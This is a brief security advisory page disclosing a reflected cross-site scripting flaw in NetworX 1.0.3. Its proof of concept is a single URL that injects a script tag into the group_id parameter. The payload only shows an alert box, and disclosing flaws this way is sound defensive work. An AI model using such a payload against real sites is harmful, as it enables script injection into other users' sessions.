Home
Consulting
Advisories
Software
Articles
Contact

NetworX 1.0.3 Reflected Cross-site Scripting

Legacy Advisories

Description

An XSS vulnerability in NetworX 1.0.3 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC